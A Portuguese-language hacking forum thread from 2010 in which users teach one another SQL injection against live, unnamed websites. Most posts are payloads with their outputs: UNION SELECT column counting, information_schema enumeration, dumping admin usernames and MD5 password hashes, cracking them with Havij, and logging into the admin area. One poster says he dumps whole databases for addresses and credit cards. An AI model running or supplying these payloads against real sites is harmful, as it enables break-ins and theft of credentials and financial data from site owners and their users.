Unconfigured Ad Widget

**MailsonHeberth** · 14-12-2010, 14:00

strong3r, coloque todo o comando que você está usando no navegador...
Coloque o site também (:
Abraço

**MailsonHeberth** · 14-12-2010, 14:00

strong3r, coloque todo o comando que você está usando no navegador...
Coloque o site também (:
Abraço

**strong3r** · 14-12-2010, 14:27

Postado Originalmente por MailsonHeberth Ver Post

strong3r, coloque todo o comando que você está usando no navegador...
Coloque o site também (:
Abraço

Opa, tudo beleza?

segue abaixo o link com os comandos.
Abraço!

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

**MailsonHeberth** · 15-12-2010, 01:54

strong3r, brother, confesso que tentei nesse site, mas nao consegui também...
Mas vou mostrar a você como se faz...

Coloque uma simples aspas no final e ira retonar um erro de sql, ele pode vim tanto como uma mensagem avisando ou sumindo tudo que tem na página.
Eu tomei como exemplo um site X (prefiro nao divulgar para nao ter ataques a ele)

Passo 1:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...'

Retornou a pagina desse ficou em branco...
Passo 2:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 6 (OK)
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... order by 7 (ERRO)

Passo 3:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6--
ou
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6--

Passo 4:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(table_name)9,4,5,6+from+informati on_schema.tables+where+table_schema=database()--

Me retornou:

ategorias,produtos,subcategorias,users

Passo 5:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(column_name)9,4,5,6+from+informat ion_schema.columns+where+table_schema=database()--

Me retornou

catID,catNome,catDesc,catImg,catExibe,prodID,prodC atID,prodSubID,prodNome,prodDesc,prodImg,prodDest, prodExibe,subID,subCatID,subNome,subDesc,subImg,su bExibe,userID,userUser,userSenha,userTipo

Temos a tabela e a coluna.
Agora:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6--

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,3,4,5,6 from users--

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,userUser,4,5,6 from users--

Me retornou:

admin

Agora:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,userSenha,4,5,6 from users--

Me retornou:

e8d95a51f3af4a3b134bf6bb680a213a ( MD5 )

E a senha dele é:

e8d95a51f3af4a3b134bf6bb680a213a = senha

Isso mesmo, essa é a senha dele.
Achando área de login:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Login: admin
Senha: senha

Obs: Usei o havij para descriptografar a senha em MD5 e usei o mesmo para achar a página de login do administrador.
Na minha opinião essa é a única utilidade do havij

Espero ter esclarecido suas dúvidas, abraço.

Tutorial by MailsonHeberth

**strong3r** · 15-12-2010, 10:10

Postado Originalmente por MailsonHeberth Ver Post

strong3r, brother, confesso que tentei nesse site, mas nao consegui também...
Mas vou mostrar a você como se faz...

Coloque uma simples aspas no final e ira retonar um erro de sql, ele pode vim tanto como uma mensagem avisando ou sumindo tudo que tem na página.
Eu tomei como exemplo um site X (prefiro nao divulgar para nao ter ataques a ele)

Passo 1:

Retornou a pagina desse ficou em branco...
Passo 2:
Passo 3:
Passo 4:
Me retornou:

Passo 5:

Me retornou
Temos a tabela e a coluna.
Agora:

Me retornou:

Agora:

Me retornou:

E a senha dele é:

Isso mesmo, essa é a senha dele.
Achando área de login:

Obs: Usei o havij para descriptografar a senha em MD5 e usei o mesmo para achar a página de login do administrador.
Na minha opinião essa é a única utilidade do havij

Espero ter esclarecido suas dúvidas, abraço.[/center]

Tutorial by MailsonHeberth

Pow cara, fico muito agradecido, isso aí vai me fornecer uma grande ajuda para prosseguir com os estudos!!

Valeu mesmo!!

**areax** · 15-12-2010, 11:28

No caso ai vc usou um comando para exibir todas colunas do database, mostrando colunas de outras tabelas desnecessárias.

Vc pode user o seguinte:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(column_name)9,4,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273--

Assim mostrará apenas colunas da tabela "users", repare que no final o nome da tabela está em hex.

7573657273 = users

Outra dica é, usar o seguinte:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(userUser,0x3a,userSenha),4,5,6 from users--

Assim, me retornará todas as contas de usuários enfileiradas presente no db.

Hex/Ascii

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Flw.

**MailsonHeberth** · 15-12-2010, 12:10

Postado Originalmente por areax Ver Post

No caso ai vc usou um comando para exibir todas colunas do database, mostrando colunas de outras tabelas desnecessárias.

Vc pode user o seguinte:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(column_name)9,4,5,6+from+informat ion_schema.columns+where+table_name=0x7573657273--

Assim mostrará apenas colunas da tabela "users", repare que no final o nome da tabela está em hex.

7573657273 = users

Outra dica é, usar o seguinte:

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar... union select 1,2,group_concat(userUser,0x3a,userSenha),4,5,6 from users--

Assim, me retornará todas as contas de usuários enfileiradas presente no db.

Hex/Ascii

Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

Flw.

Verdade, mas eu gosto de fazer ele detalhado pois pode ter algo que me interesse... Como endereços, cc, etc

Abraço

**Summ3rs** · 15-12-2010, 12:19

O comando SELECT está bloqueado para esse usuário.

Logo não dá pra explorar, só fazer union, pegar versão, data, etc.

**WarlockOwned** · 15-12-2010, 15:47

Me serviu de estudo tambem, brigado a voces

**n4sss** · 16-12-2010, 20:04

antes de puxar information_schema , verifique a versao do banco de dados com o version() :

"union select 1,3,4,5,version(),6,7 "

para ver a versao do banco de dados.

pois em 4, nao é possivel consultar o information, pois nesta versao nao temos ele, apenas nos ultimos e olhe la. ou seja ~> o 5 que traz o information_schema

nada de mais,apenas isto justifica o acsses denied ^^

Unconfigured Ad Widget

Anúncio

1 help

1 help

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment